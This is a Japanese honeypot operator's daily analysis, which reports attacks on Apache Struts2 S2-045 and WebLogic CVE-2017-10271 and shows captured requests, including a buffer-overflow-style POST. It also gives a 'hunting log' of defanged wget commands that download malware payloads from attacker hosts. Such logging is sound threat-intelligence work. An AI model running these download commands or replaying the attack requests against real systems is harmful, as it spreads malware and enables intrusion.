WOWhoneypotの2018/10/12(金) (運用129日目)の簡易分析です。
本日の総アクセス件数は 69件です。

主なアクセスは以下です。

・Apache Struts2の脆弱性S2-045（CVE-2017-5638）を突く攻撃：15件

・Weblogicの脆弱性（CVE-2017-10271）を突く攻撃：2件

・定期的にアクセスがある「Host:xx.utm999[.]com」の不正中継の調査(?)のアクセスです。

HEAD /static/upload/20180921/th_317a3298794099e0bab477e4f3d732a4.png HTTP/1.1
Host: jf.utm999[.]com
Cache-Control: no-cache

・(新規)どんな製品を狙ったものは特定はできませんでしたが、POST内容から判断するにBuffer over Flow系の攻撃でしょうか。

POST /fndex.html?id=1 HTTP/1.1
Content-Length: 256

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

以下が全アクセスログです。

本日のドメイン名でのアクセスは以下です。

5 GET /
2 GET /robots.txt

本日のハンティングログは以下です。wgetはStruts2の脆弱性を突く攻撃のものです。DL.phpはWeblogicの脆弱性を突くものです。どちらもずっと同じようなURLを使用しており、それぞれの攻撃社グループが継続的に狙っているのだと思われます。

5 2018-10-12 wget -c hxxp://wap.tfddos[.]net:57843/linux
3 2018-10-12 wget -c hxxp://43.226.146.23[:]55335/hhkkkyyy 
1 2018-10-12 hxxp://120.25.148[.]202/images/test/DL.php
1 2018-10-12 hxxp://101.00.45[.]78/images/test/DL.php

以上です。